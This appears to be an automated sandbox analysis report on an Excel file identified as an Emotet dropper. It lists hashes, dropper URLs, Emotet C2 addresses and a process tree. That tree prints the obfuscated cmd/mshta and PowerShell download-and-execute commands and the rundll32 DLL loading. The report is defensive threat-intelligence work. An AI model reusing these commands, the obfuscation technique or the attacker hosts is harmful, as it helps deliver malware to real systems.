Analysis

  • max time kernel
    122s
  • max time network
    160s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 01:28

General

  • Target

    ORO656734416BB.xls

  • Size

    46KB

  • MD5

    7eced723576899b75511edb3cda5bb69

  • SHA1

    c5819e9dd4863a29484f08f31979ff9ee5635d6e

  • SHA256

    b0dd275157f1e44d3a67df073c2504ccf2f9de33ffb66de6ef37d412434d4e5f

  • SHA512

    46120f22d2d203b565affbbf3619d57aa3fa5f62d78f67706677be893f7a9aa209dcb65167b0ba6ddfd8c8da6953f255d75640044968529507d97053388ad257

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/vvv/ppp/fe.png

Extracted

Family

emotet

Botnet

Epoch4

C2

51.15.4.22:443

173.214.173.220:8080

212.237.5.209:443

192.254.71.210:443

216.158.226.206:443

162.243.175.63:443

212.24.98.99:8080

58.227.42.236:80

45.118.115.99:8080

104.251.214.46:8080

185.157.82.209:8080

46.55.222.11:443

188.40.137.206:8080

81.0.236.90:443

103.75.201.2:443

129.232.188.93:443

195.154.133.20:443

159.8.59.82:8080

79.172.212.216:8080

138.185.72.26:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ORO656734416BB.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2424
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3872
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:3940
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2612
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1036
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:976
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:1880
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Siqqoszoez\qbuaqehmiized.ney",nhOIpjIBminaFp
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2096
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Siqqoszoez\qbuaqehmiized.ney",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4036
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 3940 -s 1660
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3088

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    97daeda7d5269be2a567138e6ed876fe

    SHA1

    ce707e51f782320a38f0bb434277edcc4394abbb

    SHA256

    918b972486087dfd6d7ad348771617d9c9a45a7dc9ed5ce48b525e2ceb70da7f

    SHA512

    1c7a1b4d13e874dc6359d4bbcf8c0d5efd6ec8143daebd8b512c3f3b6fc6da2666feba404ac4c73fae91229ae541856c94a52d7e707acc593af44b89eb8901be

  • \ProgramData\QWER.dll
    MD5

    97daeda7d5269be2a567138e6ed876fe

    SHA1

    ce707e51f782320a38f0bb434277edcc4394abbb

    SHA256

    918b972486087dfd6d7ad348771617d9c9a45a7dc9ed5ce48b525e2ceb70da7f

    SHA512

    1c7a1b4d13e874dc6359d4bbcf8c0d5efd6ec8143daebd8b512c3f3b6fc6da2666feba404ac4c73fae91229ae541856c94a52d7e707acc593af44b89eb8901be

  • \ProgramData\QWER.dll
    MD5

    97daeda7d5269be2a567138e6ed876fe

    SHA1

    ce707e51f782320a38f0bb434277edcc4394abbb

    SHA256

    918b972486087dfd6d7ad348771617d9c9a45a7dc9ed5ce48b525e2ceb70da7f

    SHA512

    1c7a1b4d13e874dc6359d4bbcf8c0d5efd6ec8143daebd8b512c3f3b6fc6da2666feba404ac4c73fae91229ae541856c94a52d7e707acc593af44b89eb8901be

  • memory/976-321-0x0000000004A80000-0x0000000004AA5000-memory.dmp
    Filesize

    148KB

  • memory/1880-333-0x0000000004A20000-0x0000000004A45000-memory.dmp
    Filesize

    148KB

  • memory/1880-337-0x0000000004C10000-0x0000000004C35000-memory.dmp
    Filesize

    148KB

  • memory/1880-331-0x00000000049C0000-0x00000000049E5000-memory.dmp
    Filesize

    148KB

  • memory/1880-329-0x0000000004860000-0x0000000004885000-memory.dmp
    Filesize

    148KB

  • memory/1880-326-0x0000000004350000-0x0000000004375000-memory.dmp
    Filesize

    148KB

  • memory/1880-324-0x0000000000960000-0x0000000000985000-memory.dmp
    Filesize

    148KB

  • memory/2096-338-0x00000000008A0000-0x00000000008C5000-memory.dmp
    Filesize

    148KB

  • memory/2424-132-0x00007FF9E4750000-0x00007FF9E4760000-memory.dmp
    Filesize

    64KB

  • memory/2424-594-0x00007FF9E80C0000-0x00007FF9E80D0000-memory.dmp
    Filesize

    64KB

  • memory/2424-593-0x00007FF9E80C0000-0x00007FF9E80D0000-memory.dmp
    Filesize

    64KB

  • memory/2424-121-0x00007FF9E80C0000-0x00007FF9E80D0000-memory.dmp
    Filesize

    64KB

  • memory/2424-120-0x00007FF9E80C0000-0x00007FF9E80D0000-memory.dmp
    Filesize

    64KB

  • memory/2424-119-0x00007FF9E80C0000-0x00007FF9E80D0000-memory.dmp
    Filesize

    64KB

  • memory/2424-592-0x00007FF9E80C0000-0x00007FF9E80D0000-memory.dmp
    Filesize

    64KB

  • memory/2424-591-0x00007FF9E80C0000-0x00007FF9E80D0000-memory.dmp
    Filesize

    64KB

  • memory/2424-124-0x00007FF9E80C0000-0x00007FF9E80D0000-memory.dmp
    Filesize

    64KB

  • memory/2424-131-0x00007FF9E4750000-0x00007FF9E4760000-memory.dmp
    Filesize

    64KB

  • memory/2424-118-0x00007FF9E80C0000-0x00007FF9E80D0000-memory.dmp
    Filesize

    64KB

  • memory/2612-309-0x0000024F71F00000-0x0000024F71F76000-memory.dmp
    Filesize

    472KB

  • memory/2612-314-0x0000024F71160000-0x0000024F71260000-memory.dmp
    Filesize

    1024KB

  • memory/2612-280-0x0000024F71160000-0x0000024F71260000-memory.dmp
    Filesize

    1024KB

  • memory/2612-281-0x0000024F71160000-0x0000024F71260000-memory.dmp
    Filesize

    1024KB

  • memory/2612-277-0x0000024F71760000-0x0000024F71782000-memory.dmp
    Filesize

    136KB

  • memory/2612-298-0x0000024F71AF0000-0x0000024F71B2C000-memory.dmp
    Filesize

    240KB

  • memory/4036-341-0x0000000002FE0000-0x0000000003005000-memory.dmp
    Filesize

    148KB

  • memory/4036-340-0x0000000002FE1000-0x0000000003002000-memory.dmp
    Filesize

    132KB